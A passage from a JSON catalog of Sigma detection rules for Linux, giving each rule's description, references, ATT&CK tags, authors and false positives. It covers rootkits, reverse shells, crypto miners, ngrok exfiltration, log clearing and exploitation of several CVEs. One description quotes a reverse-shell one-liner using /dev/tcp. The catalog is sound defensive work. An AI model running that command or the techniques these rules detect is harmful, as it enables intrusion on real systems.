"file_create_lnx_triple_cross_rootkit_lock_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. 
Which both are related to the TripleCross persistence method", - "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "value": "Triple Cross eBPF Rootkit Default Persistence", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" - ], - "creation_date": "2022/07/05", - "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ], - "creation_date": "2017/02/28", - "filename": "modsec_mulitple_blocks.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", - "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "value": "Linux Reverse Shell Indicator", - "meta": { - "refs": [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/16", - "filename": "net_connection_lnx_back_connect_shell_dev.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "value": "Linux Crypto Mining Pool Connections", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/26", - "filename": "net_connection_lnx_crypto_mining_indicators.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "value": "Communication To Ngrok Tunneling Service - Linux", - "meta": { - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ], - "creation_date": "2022/11/03", - "filename": "net_connection_lnx_ngrok_tunnel.yml", - 
"author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects relevant ClamAV messages", - "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", - "value": "Relevant ClamAV Message", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.001" - ], - "creation_date": "2017/03/01", - "filename": "lnx_clamav.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/06/17", - "filename": "lnx_security_tools_disabling_syslog.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", - "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", - "value": "SSHD Error Message CVE-2018-15473", - "meta": { - "refs": [ - "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1589" - ], - "creation_date": "2017/08/24", - "filename": "lnx_ssh_cve_2018_15473.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", - "value": "Failed Logins with Different Accounts from Single Source - Linux", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2017/02/16", - "filename": "lnx_susp_failed_logons_single_source.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious session with two users present", - "uuid": "1edd77db-0669-4fef-9598-165bda82826d", - "value": "Guacamole Two Users Sharing Session Anomaly", - "meta": { - "refs": [ - "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2020/07/03", - "filename": "lnx_susp_guacamole.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be 
caused by exploiting attempts", - "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", - "value": "Suspicious Named Error", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2018/02/20", - "filename": "lnx_susp_named.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", - "value": "Suspicious OpenSSH Daemon Error", - "meta": { - "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/06/30", - "filename": "lnx_susp_ssh.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", - "value": "Suspicious VSFTPD Error Messages", - "meta": { - "refs": [ - "https://github.com/dagwieers/vsftpd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" 
- ], - "creation_date": "2017/07/05", - "filename": "lnx_susp_vsftp.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", - "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", - "value": "Scheduled Task/Job At", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.002" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_at_command.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", - "value": "Decode Base64 Encoded Text", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_base64_decode.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - 
"logsource.product": "linux" - } - }, - { - "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", - "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", - "value": "Linux Base64 Encoded Pipe to Shell", - "meta": { - "refs": [ - "https://github.com/arget13/DDexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/07/26", - "filename": "proc_creation_lnx_base64_execution.yml", - "author": "pH-T", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", - "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", - "value": "Linux Base64 Encoded Shebang In CLI", - "meta": { - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_base64_shebang_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the usage of the unsafe bpftrace option", - "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", - "value": "BPFtrace Unsafe Option Usage", - "meta": { - "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", - 
"https://bpftrace.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2022/02/11", - "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the unsafe option" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", - "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", - "value": "Cat Sudoers", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_cat_sudoers.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", - "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", - "value": "Remove Immutable File Attribute", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_chattr_immutable_removal.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrator 
interacting with immutable files (e.g. for instance backups)." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", - "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", - "value": "Clear Linux Logs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_lnx_clear_logs.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", - "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", - "value": "Commands to Clear or Remove the Syslog", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_clear_syslog.yml", - "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Log rotation." 
- ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", - "value": "Clipboard Collection with Xclip Tool", - "meta": { - "refs": [ - "https://www.packetlabs.net/posts/clipboard-data-security/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_clipboard_collection.yml", - "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", - "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", - "value": "Remove Scheduled Cron Task/Job", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_crontab_removal.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": 
"linux" - } - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", - "value": "Linux Crypto Mining Indicators", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/26", - "filename": "proc_creation_lnx_crypto_mining.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", - "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", - "value": "Curl Usage on Linux", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_curl_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", - "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", - "value": "Atlassian Confluence CVE-2022-26134", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059", - "cve.2022.26134" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", - "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", - "value": "Apache Spark Shell Command Injection - ProcessCreation", - "meta": { - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ], - "creation_date": "2022/07/20", - "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects potential overwriting and deletion of a file using DD.", - "uuid": "2953194b-e33c-4859-b9e8-05948c167447", - "value": "DD File Overwrite", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_dd_file_overwrite.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "low", - "falsepositive": [ - "Any user deleting files that way." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", - "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", - "value": "Linux Doas Tool Execution", - "meta": { - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/01/20", - "filename": "proc_creation_lnx_doas_execution.yml", - "author": "Sittikorn S, Teoderick Contreras", - "level": "low", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", - "value": "File and Directory Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2020/10/19", - "filename": 
"proc_creation_lnx_file_and_directory_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", - "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", - "value": "File Deletion", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_lnx_file_deletion.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", - "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", - "value": "Install Root Certificate", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_lnx_install_root_certificate.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "low", - "falsepositive": [ - 
"Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", - "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", - "value": "Local System Accounts Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_lnx_local_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", - "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", - "value": "Local Groups Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_lnx_local_groups.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", - "value": "Linux Network Service Scanning", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_lnx_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", - "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", - "value": "Nohup Execution", - "meta": { - "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", - "https://en.wikipedia.org/wiki/Nohup", - 
"https://www.computerhope.com/unix/unohup.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/06", - "filename": "proc_creation_lnx_nohup.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Administrators or installed processes that leverage nohup" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", - "value": "OMIGOD SCX RunAsProvider ExecuteScript", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/10/15", - "filename": 